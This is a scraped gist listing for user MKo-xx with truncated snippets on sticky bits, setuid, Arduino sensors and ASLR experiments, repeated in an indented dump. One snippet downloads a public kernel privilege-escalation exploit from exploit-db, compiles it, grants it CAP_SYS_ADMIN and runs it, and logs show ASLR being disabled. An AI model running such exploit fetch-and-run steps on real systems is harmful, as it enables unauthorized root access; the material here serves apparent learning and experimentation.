Mkrtich MKo-xx

## sticky bit.sh
$ mkdir tmp
$ sudo chown root:root tmp # change owner to root
$ sudo chmod o+w tmp       # add permission to other user to add files
$
$ sudo mkdir tmp/123     # create a directory owned by root
$ sudo chmod 777 tmp/123 # give all permissions, so other user can remove it.
$ rm -r tmp/123          # remove it without any problem.
$
$ sudo mkdir tmp/123     # create a directory owned by root again
$ sudo chmod 777 tmp/123 # give all permissions, so other user can remove it.

## setuid.bash
$ which sudo
/usr/bin/sudo
$ cp /usr/bin/sudo ./ # copy sudo tool
$ sudo chown root:root sudo #convert owner to root
$ ll
...
-rwxr-xr-x 1 root     root     147872 2011-03-31 19:50 sudo*
$
$ ./sudo echo 1 #this will give error
sudo: must be setuid root

## servo.pde
#include <Servo.h>

// make sure the pin has PWM capability
const int servo_pin = 11;
Servo myservo;

void setup()
{
  Serial.begin(9600);
  myservo.attach(servo_pin);

## exploit.sh
$ wget http://www.exploit-db.com/download/15944
$ mv 15944 15944.c
$ gcc 15944.c -o exe # ignore warnings(if any)
$ # For more info search CAP_SYS_ADMIN in /usr/include/linux/capability.h
$ # Unfortunately, we need root privileges here
$ sudo setcap cap_sys_admin+ep ./exe
$ whoami
<your username (different from root)>
$ ./exe
[*] Testing Phonet support and CAP_SYS_ADMIN...

## ADXL335.pde
const int xpin = 0;
const int ypin = 1;
const int zpin = 2;
const int measue_count = 1000;

void setup()
{
  Serial.begin(9600);
}

## aslr.c
#include <stdio.h>            // printf
#include <string.h>           // strerror
#include <errno.h>            // errno
#include <unistd.h>           // execl
#include <sys/ptrace.h>       // ptrace
#include <sys/user.h>         // user_regs_struct
#include <sys/personality.h>  // personality

int
main() {

## gist:886820

      
        
          
            
              
              0 files
            
          
          
            
              
              0 forks
            
          
          
            
              
              0 comments
            
          
          
            
              
              0 stars
            
          
        
        
          
              
          
          
            
                MKo-xx
                / gist:886820
            
            
              Created
              March 25, 2011 13:16
            
          
        
      
        
          
            
              
              We couldn’t find that file to show.
              
            
          
        
    

## shell.personality.2.log
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ strace -o 1 setarch x86_64 -R ls
1  2  a.out  aslr.c
$ strace -o 2 setarch x86_64  ls
1  2  a.out  aslr.c
$ diff 1 2
1c1
< execve("/usr/bin/setarch", ["setarch", "x86_64", "-R", "ls"], [/* 38 vars */]) = 0
---
> execve("/usr/bin/setarch", ["setarch", "x86_64", "ls"], [/* 38 vars */]) = 0

## shell.personality.1.log
$ strace -o 1 setarch x86_64 -R ls
1  2  a.out  aslr.c
$ strace -o 2 setarch x86_64  ls
1  2  a.out  aslr.c
$ diff 1 2
...
a lot of differences
...

## shell3.log
$ cat /proc/sys/kernel/randomize_va_space  # see status of ASLR
2
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # disable ASLR
0
$ cat /proc/self/maps >1
$ cat /proc/self/maps >2
$ diff 1 2                # shows no difference again
	$ mkdir tmp
	$ sudo chown root:root tmp # change owner to root
	$ sudo chmod o+w tmp # add permission to other user to add files
	$
	$ sudo mkdir tmp/123 # create a directory owned by root
	$ sudo chmod 777 tmp/123 # give all permissions, so other user can remove it.
	$ rm -r tmp/123 # remove it without any problem.
	$
	$ sudo mkdir tmp/123 # create a directory owned by root again
	$ sudo chmod 777 tmp/123 # give all permissions, so other user can remove it.
	$ which sudo
	/usr/bin/sudo
	$ cp /usr/bin/sudo ./ # copy sudo tool
	$ sudo chown root:root sudo #convert owner to root
	$ ll
	...
	-rwxr-xr-x 1 root root 147872 2011-03-31 19:50 sudo*
	$
	$ ./sudo echo 1 #this will give error
	sudo: must be setuid root
	#include <Servo.h>

	// make sure the pin has PWM capability
	const int servo_pin = 11;
	Servo myservo;

	void setup()
	{
	Serial.begin(9600);
	myservo.attach(servo_pin);
	$ wget http://www.exploit-db.com/download/15944
	$ mv 15944 15944.c
	$ gcc 15944.c -o exe # ignore warnings(if any)
	$ # For more info search CAP_SYS_ADMIN in /usr/include/linux/capability.h
	$ # Unfortunately, we need root privileges here
	$ sudo setcap cap_sys_admin+ep ./exe
	$ whoami
	<your username (different from root)>
	$ ./exe
	[*] Testing Phonet support and CAP_SYS_ADMIN...
	const int xpin = 0;
	const int ypin = 1;
	const int zpin = 2;
	const int measue_count = 1000;

	void setup()
	{
	Serial.begin(9600);
	}
	#include <stdio.h> // printf
	#include <string.h> // strerror
	#include <errno.h> // errno
	#include <unistd.h> // execl
	#include <sys/ptrace.h> // ptrace
	#include <sys/user.h> // user_regs_struct
	#include <sys/personality.h> // personality

	int
	main() {
	$ echo 0 \| sudo tee /proc/sys/kernel/randomize_va_space
	$ strace -o 1 setarch x86_64 -R ls
	1 2 a.out aslr.c
	$ strace -o 2 setarch x86_64 ls
	1 2 a.out aslr.c
	$ diff 1 2
	1c1
	< execve("/usr/bin/setarch", ["setarch", "x86_64", "-R", "ls"], [/* 38 vars */]) = 0
	---
	> execve("/usr/bin/setarch", ["setarch", "x86_64", "ls"], [/* 38 vars */]) = 0
	$ cat /proc/sys/kernel/randomize_va_space # see status of ASLR
	2
	$ echo 0 \| sudo tee /proc/sys/kernel/randomize_va_space # disable ASLR
	0
	$ cat /proc/self/maps >1
	$ cat /proc/self/maps >2
	$ diff 1 2 # shows no difference again